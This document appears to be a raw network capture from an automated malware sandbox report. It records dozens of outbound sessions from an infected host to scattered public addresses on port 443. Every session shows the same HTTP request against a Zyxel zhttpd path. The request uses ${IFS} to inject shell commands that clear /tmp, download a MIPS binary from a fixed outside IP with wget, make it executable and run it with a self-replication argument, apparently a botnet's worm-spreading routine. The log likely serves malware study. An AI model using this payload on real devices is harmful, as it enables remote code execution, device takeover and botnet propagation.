                                                        Jan 28, 2024 10:12:48.328629017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3289192.168.2.144653014.41.162.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328664064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3290192.168.2.1455366222.76.112.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328689098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3291192.168.2.1442028216.95.250.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328732967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3292192.168.2.1442996159.66.224.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328788996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3293192.168.2.1455798164.14.170.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328819990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3294192.168.2.1455250134.8.146.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328871012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3295192.168.2.14440768.234.114.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328922033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3296192.168.2.1458860132.237.37.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328958988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3297192.168.2.1452718149.174.252.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.328993082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3298192.168.2.145656258.195.126.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329035997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3299192.168.2.1433924135.23.138.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329088926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3300192.168.2.1459428118.233.129.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329127073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3301192.168.2.144876087.190.139.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329176903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3302192.168.2.143407686.110.32.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329205036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3303192.168.2.1432778107.90.239.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329235077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3304192.168.2.1444508218.116.133.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329277039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3305192.168.2.144095050.142.93.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329310894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3306192.168.2.1453350107.129.188.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329355001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3307192.168.2.1434758112.68.203.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329402924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3308192.168.2.145018675.219.67.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329441071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3309192.168.2.145549652.0.175.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329476118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3310192.168.2.144239468.98.86.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329524994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3311192.168.2.1452828101.85.52.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329566002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3312192.168.2.1436102186.180.243.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329607010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3313192.168.2.1450658109.48.209.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329632044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3314192.168.2.1455730169.24.231.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329687119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3315192.168.2.1440344136.147.2.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329720974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3316192.168.2.145673063.198.96.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329751968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3317192.168.2.1457160211.53.53.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329822063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3318192.168.2.1441500162.11.220.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329844952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3319192.168.2.1459252108.10.65.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329880953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3320192.168.2.144746631.67.154.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329937935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3321192.168.2.1438666219.147.40.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.329957008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3322192.168.2.143870894.63.180.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330005884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3323192.168.2.1434284183.70.237.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330038071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3324192.168.2.1439124149.239.69.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330079079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3325192.168.2.1451624158.140.161.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330125093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3326192.168.2.143686296.114.222.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330171108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3327192.168.2.144168498.220.141.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330205917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3328192.168.2.1449596206.171.233.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330260038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3329192.168.2.1439176140.161.57.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330281019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3330192.168.2.1449660134.40.100.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330322981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3331192.168.2.143902094.102.237.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330380917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3332192.168.2.1452696221.13.218.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330400944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3333192.168.2.144410837.97.118.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330451965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3334192.168.2.145333225.79.229.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330513954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3335192.168.2.1459828122.243.146.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330543995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3336192.168.2.1442856137.152.216.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330554008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3337192.168.2.1435328117.2.252.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330615997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3338192.168.2.1434836209.191.35.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330661058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3339192.168.2.1456200148.199.119.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330697060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3340192.168.2.144076874.247.76.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330729008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3341192.168.2.143756254.14.171.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330763102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3342192.168.2.1458914106.158.196.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330790997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3343192.168.2.14598785.215.233.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330818892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3344192.168.2.1455696118.128.101.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330873966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3345192.168.2.1446092118.124.173.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330918074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3346192.168.2.143907485.123.179.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330950975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3347192.168.2.145956663.77.17.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.330972910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3348192.168.2.145547213.202.221.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331018925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3349192.168.2.143470438.200.11.166443
                                                        TimestampBytes transferredDirectionData
